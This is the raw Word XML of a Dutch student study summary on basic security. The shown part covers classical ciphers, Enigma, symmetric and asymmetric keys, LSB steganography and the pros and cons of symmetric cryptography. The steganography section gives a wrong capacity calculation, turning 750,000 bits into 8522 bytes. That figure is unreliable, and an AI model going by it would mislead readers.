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97CBE" w14:textId="77777777" w:rsidR="00214337" w:rsidRDefault="0018509A" w:rsidP="0018509A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Basic Security Samenvatting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094E08ED" w14:textId="77777777" w:rsidR="009A312B" w:rsidRDefault="009A312B" w:rsidP="009A312B"/>
    <w:p w14:paraId="07EFA644" w14:textId="77777777" w:rsidR="00F55341" w:rsidRDefault="00CE34CD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t "Heading 2,1" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F55341">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Cryptografie Inleiding</w:t>
      </w:r>
      <w:r w:rsidR="00F55341">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F55341">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F55341">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc453378490 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00F55341">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00F55341">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F55341">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00F55341">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCA3FAB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Symmetrische Cryptograf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F9491A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Assymetrische Cryptograf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765D4F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Has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68AFE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Digitale handteken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6F36AC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Hybride Cryptograf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913CD4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Certific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D74A69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PKI Archite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4E7D3B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Web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27072B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S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4AC215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VP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0461B7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Secure Electronic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258B44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Firew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5C64C1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Virus/W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F920AAA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Trojans / Rootk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B011B2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Sniff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DA3AFE9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Denial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BA033BE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Vulnerability Scan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BEDDF69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Intrusiedetec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FA07B63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Logging &amp; S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AAA604E" w14:textId="77777777" w:rsidR="00F55341" w:rsidRDefault="00F55341">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="10763"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Priv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7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FB71C5F" w14:textId="0807499E" w:rsidR="00146279" w:rsidRDefault="00CE34CD" w:rsidP="0038336D">
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3142842A" w14:textId="5D9E7EAF" w:rsidR="00146279" w:rsidRDefault="00146279" w:rsidP="00146279">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="914"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8738E6" w14:textId="77777777" w:rsidR="0018509A" w:rsidRDefault="006520FA" w:rsidP="00301DBA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00146279">
        <w:br w:type="column"/>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_Toc453378490"/>
      <w:r w:rsidR="00301DBA">
        <w:lastRenderedPageBreak/>
        <w:t>Cryptografie</w:t>
      </w:r>
      <w:r w:rsidR="000E630A">
        <w:t xml:space="preserve"> Inleiding</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="6EC84160" w14:textId="77777777" w:rsidR="00301DBA" w:rsidRDefault="00301DBA" w:rsidP="00301DBA"/>
    <w:p w14:paraId="313DA498" w14:textId="77777777" w:rsidR="006520FA" w:rsidRPr="006520FA" w:rsidRDefault="006520FA" w:rsidP="006520FA">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="006520FA">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45B36153" wp14:editId="0DA98E56">
            <wp:extent cx="3969017" cy="17407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26" cy="17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E02A45" w14:textId="77777777" w:rsidR="006520FA" w:rsidRDefault="006520FA" w:rsidP="006520FA"/>
    <w:p w14:paraId="46C264BE" w14:textId="1C54962C" w:rsidR="006520FA" w:rsidRDefault="006520FA" w:rsidP="006520FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dezelfde sleutel wordt gebruikt voor </w:t>
      </w:r>
      <w:r w:rsidR="003966F9">
        <w:t>Encrypt/Decrypt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9FB866" w14:textId="77777777" w:rsidR="006520FA" w:rsidRDefault="006520FA" w:rsidP="006520FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Decryptieproces is het omgekeerde van het Encryptieproces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C71DFB2" w14:textId="77777777" w:rsidR="006520FA" w:rsidRDefault="006520FA" w:rsidP="006520FA"/>
    <w:p w14:paraId="479F83CF" w14:textId="77777777" w:rsidR="006520FA" w:rsidRDefault="006520FA" w:rsidP="006520FA">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="006520FA">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F3D3C34" wp14:editId="4B3B86E8">
            <wp:extent cx="3801714" cy="2375439"/>
            <wp:effectExtent l="0" t="0" r="889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24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90755D" w14:textId="77777777" w:rsidR="006520FA" w:rsidRDefault="006520FA" w:rsidP="006520FA">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39F35078" w14:textId="08491164" w:rsidR="006520FA" w:rsidRDefault="003966F9" w:rsidP="006520FA">
      <w:r>
        <w:t xml:space="preserve">Er zijn 3 eigenschappen die </w:t>
      </w:r>
      <w:r w:rsidR="00721317">
        <w:t>de classificatie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> van een  Crypto-systeem bepalen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E12B150" w14:textId="77777777" w:rsidR="003966F9" w:rsidRDefault="003966F9" w:rsidP="006520FA"/>
    <w:p w14:paraId="05400C8F" w14:textId="31CC11AE" w:rsidR="003966F9" w:rsidRPr="00244A70" w:rsidRDefault="003966F9" w:rsidP="003966F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00244A70">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Operaties X -&gt; Y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF397D0" w14:textId="77777777" w:rsidR="006151AC" w:rsidRDefault="003966F9" w:rsidP="003966F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Substitutie (confusion</w:t>
      </w:r>
      <w:r w:rsidR="006151AC">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC91EF3" w14:textId="750D7AFD" w:rsidR="006151AC" w:rsidRDefault="006151AC" w:rsidP="006151AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Caesar</w:t>
      </w:r>
      <w:r w:rsidR="005B5372">
        <w:t xml:space="preserve"> (mono-alfabetisch)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED514F0" w14:textId="15408B85" w:rsidR="006151AC" w:rsidRDefault="006151AC" w:rsidP="006151AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sleutel = aantal te verschuiven plaatsen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F90E8D2" w14:textId="58315DAF" w:rsidR="006151AC" w:rsidRDefault="006151AC" w:rsidP="006151AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Caesar5 -&gt; ABCDE wordt FGHIJ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E20AFB" w14:textId="159C222C" w:rsidR="003966F9" w:rsidRDefault="006151AC" w:rsidP="006151AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Vigenère</w:t>
      </w:r>
      <w:r w:rsidR="005B5372">
        <w:t xml:space="preserve"> (poly-alfabetisch)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077841DF" w14:textId="6B0A197B" w:rsidR="005B5372" w:rsidRDefault="005B5372" w:rsidP="005B5372">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De key is een sleutelwoord</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4C594C" w14:textId="7CD1744E" w:rsidR="005B5372" w:rsidRDefault="005B5372" w:rsidP="005B5372">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>KEY onder message schrijven -&gt; elke letter vervangen door andere letter in de tabel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061B8C13" w14:textId="77777777" w:rsidR="009B1032" w:rsidRDefault="003966F9" w:rsidP="003966F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Transpositie (diffusion, permutation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444243D1" w14:textId="77777777" w:rsidR="009B1032" w:rsidRDefault="009B1032" w:rsidP="009B1032">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Kolom / Blokvercijfering -&gt; Blokgrootte is breedte van kolom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6663E3DB" w14:textId="77777777" w:rsidR="00244A70" w:rsidRDefault="009B1032" w:rsidP="009B1032">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Je leest de Encrypted message vervolgens af van boven naar onder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EAF444" w14:textId="77777777" w:rsidR="00244A70" w:rsidRDefault="00244A70" w:rsidP="009B1032">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Andere vormen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094B4F1B" w14:textId="77777777" w:rsidR="00244A70" w:rsidRDefault="00244A70" w:rsidP="00244A70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Scytale: Cilinder met gewikkelde strook rond. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3713663C" w14:textId="77777777" w:rsidR="00244A70" w:rsidRDefault="00244A70" w:rsidP="00244A70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Enkel met de juiste diameter van cilinder is de boodschap leesbaar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622C7D0A" w14:textId="77777777" w:rsidR="00244A70" w:rsidRDefault="00244A70" w:rsidP="00244A70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enigma machine: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DE0307" w14:textId="5FC5DDF8" w:rsidR="00244A70" w:rsidRDefault="00244A70" w:rsidP="00244A70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>3 rotors met 26 tekens, init-stand moet gekend zijn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCF1986" w14:textId="44E15E2B" w:rsidR="003966F9" w:rsidRDefault="00244A70" w:rsidP="00244A70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>= Caesar met een twist</w:t>
      </w:r>
      <w:r w:rsidR="000F1CE4">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6771B4EB" w14:textId="14E660C1" w:rsidR="003966F9" w:rsidRPr="00244A70" w:rsidRDefault="00244A70" w:rsidP="003966F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:r w:rsidR="003966F9" w:rsidRPr="00244A70">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Aantal gebruikte sleutels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E4549F" w14:textId="4AC01964" w:rsidR="003966F9" w:rsidRDefault="003966F9" w:rsidP="003966F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Symmetrisch</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Secret Key</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Dezelfde sleutels voor Encrypt/Decrypt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7411DA9E" w14:textId="0F6F4112" w:rsidR="003966F9" w:rsidRDefault="003966F9" w:rsidP="003966F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Assymmetrisch </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Public Key</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Verschillende sleutels</w:t>
      </w:r>
      <w:r w:rsidR="000F1CE4">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="39652BE1" w14:textId="1EB1D6E9" w:rsidR="003966F9" w:rsidRPr="00244A70" w:rsidRDefault="003966F9" w:rsidP="003966F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00244A70">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Operaties input -&gt; X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DEDC2F" w14:textId="1D456DDB" w:rsidR="003966F9" w:rsidRDefault="003966F9" w:rsidP="003966F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Blokvercijfering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AC1EF2" w14:textId="77777777" w:rsidR="00BE6C32" w:rsidRDefault="003966F9" w:rsidP="00214337">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Stroomvercijferen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D58448" w14:textId="77777777" w:rsidR="00BE6C32" w:rsidRDefault="00BE6C32" w:rsidP="00BE6C32"/>
    <w:p w14:paraId="4DDBE94E" w14:textId="462C25B2" w:rsidR="003966F9" w:rsidRPr="00BE6C32" w:rsidRDefault="003966F9" w:rsidP="000E630A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE6C32">
        <w:t>Steganografie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4737FAC0" w14:textId="77777777" w:rsidR="00897027" w:rsidRDefault="00897027" w:rsidP="00897027"/>
    <w:p w14:paraId="00128402" w14:textId="77777777" w:rsidR="00095AD1" w:rsidRDefault="00897027" w:rsidP="00095AD1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Boodschap verbergen in een foto</w:t>
      </w:r>
      <w:r w:rsidR="000B16AC">
        <w:t>, geluids- of videobestand.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135FA90C" w14:textId="0A7D98D4" w:rsidR="00095AD1" w:rsidRDefault="00095AD1" w:rsidP="00095AD1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Foto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607D6B7C" w14:textId="2A7C98D0" w:rsidR="00897027" w:rsidRDefault="00897027" w:rsidP="00095AD1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Je gebruikt de </w:t>
      </w:r>
      <w:r w:rsidRPr="00897027">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Least Signifant Bit</w:t>
      </w:r>
      <w:r w:rsidR="00255910">
        <w:t xml:space="preserve"> in de RGB-</w:t>
      </w:r>
      <w:r>
        <w:t>waarde van iedere pixel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163FAB93" w14:textId="23A54D28" w:rsidR="00897027" w:rsidRDefault="00897027" w:rsidP="00095AD1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>500px*500px foto -&gt; 250.000 pixels * 3 (RGB) -&gt; 750.000 pixels</w:t>
      </w:r>
      <w:r w:rsidR="00E75C38">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D033A25" w14:textId="43380564" w:rsidR="00897027" w:rsidRDefault="00897027" w:rsidP="00095AD1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>750.000 = 750.000 bits of / 8 -&gt; 8522 bytes om data in te stoppen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EB362A" w14:textId="7DEF7737" w:rsidR="00095AD1" w:rsidRDefault="00095AD1" w:rsidP="00095AD1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Geluid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A89A79A" w14:textId="4B808AE1" w:rsidR="00095AD1" w:rsidRDefault="00095AD1" w:rsidP="00095AD1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Menselijk gehoor gaat maar tot ˜20.000Hz maxima</w:t>
      </w:r>
      <w:r w:rsidR="002D6463">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="00B83C66">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAFCBAF" w14:textId="22E40429" w:rsidR="006C77E0" w:rsidRDefault="00095AD1" w:rsidP="00214337">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Je verstopt de boodschap in het geluidspectrum boven deze frequentie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313F2249" w14:textId="5CEA7756" w:rsidR="000E630A" w:rsidRDefault="000E630A" w:rsidP="000E630A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_Toc453378491"/>
      <w:r w:rsidR="00F07E33">
        <w:lastRenderedPageBreak/>
        <w:t>Symmetrische C</w:t>
      </w:r>
      <w:r>
        <w:t>ryptografie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="09AACC05" w14:textId="77777777" w:rsidR="004C1789" w:rsidRDefault="004C1789" w:rsidP="004C1789"/>
    <w:p w14:paraId="7861991B" w14:textId="2F359D84" w:rsidR="004C1789" w:rsidRDefault="004C1789" w:rsidP="004C1789">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Algemene eigenschappen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533B90FA" w14:textId="77777777" w:rsidR="004C1789" w:rsidRDefault="004C1789" w:rsidP="004C1789"/>
    <w:p w14:paraId="36E88A80" w14:textId="692F9B31" w:rsidR="004C1789" w:rsidRDefault="004C1789" w:rsidP="004C1789">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Dezelfde secret key wordt gebruikt door verzender/ontvanger (gevaar!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B328A8C" w14:textId="1232BC25" w:rsidR="000E630A" w:rsidRDefault="004C1789" w:rsidP="000E630A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Gebruikt een publiek algoritme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F688539" w14:textId="77777777" w:rsidR="004C1789" w:rsidRDefault="004C1789" w:rsidP="004C1789"/>
    <w:p w14:paraId="203AC19B" w14:textId="7B04672E" w:rsidR="004C1789" w:rsidRDefault="004C1789" w:rsidP="004C1789">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Voordelen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09221175" w14:textId="77777777" w:rsidR="004C1789" w:rsidRDefault="004C1789" w:rsidP="004C1789"/>
    <w:p w14:paraId="72F739F5" w14:textId="174D6B38" w:rsidR="004C1789" w:rsidRPr="00DA3433" w:rsidRDefault="00DA3433" w:rsidP="004C1789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DA3433">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Number Cruncher = </w:t>
      </w:r>
      <w:r w:rsidR="004C1789" w:rsidRPr="00DA3433">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Snelheid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343C8DD4" w14:textId="77777777" w:rsidR="004C1789" w:rsidRDefault="004C1789" w:rsidP="004C1789"/>
    <w:p w14:paraId="178C6660" w14:textId="3AD5DECE" w:rsidR="004C1789" w:rsidRDefault="004C1789" w:rsidP="004C1789">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Nadelen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004038F6" w14:textId="77777777" w:rsidR="004C1789" w:rsidRDefault="004C1789" w:rsidP="004C1789"/>
    <w:p w14:paraId="39D14979" w14:textId="3BD6D8B3" w:rsidR="004C1789" w:rsidRPr="00DA3433" w:rsidRDefault="004C1789" w:rsidP="004C1789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DA3433">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Key-management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336EC70C" w14:textId="15393424" w:rsidR="004C1789" w:rsidRDefault="004C1789" w:rsidP="004C1789">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Het aantal keys stijgt </w:t>
      </w:r>
      <w:r w:rsidR="00EC5E4E">
        <w:t>kwadratisch</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006465B1">
        <w:t>met</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> het aantal users</w:t>
      </w:r>
      <w:r w:rsidR="006465B1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE66C47" w14:textId="08390758" w:rsidR="00224C71" w:rsidRDefault="00224C71" w:rsidP="004C1789">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>6 users -&gt; 15 sleutels, 7 users -&gt; 21 sleutels, etc…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9228D3" w14:textId="5E40372F" w:rsidR="009266E3" w:rsidRPr="00DA3433" w:rsidRDefault="0047586E" w:rsidP="009266E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA3433">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Kleine K</w:t>
      </w:r>
      <w:r w:rsidR="009266E3" w:rsidRPr="00DA3433">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">ey-size en </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA3433">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="009266E3" w:rsidRPr="00DA3433">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>lock-size maken het doenbaar om dit te brute-forcen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D57D75" w14:textId="77777777" w:rsidR="004C1789" w:rsidRDefault="004C1789" w:rsidP="004C1789"/>
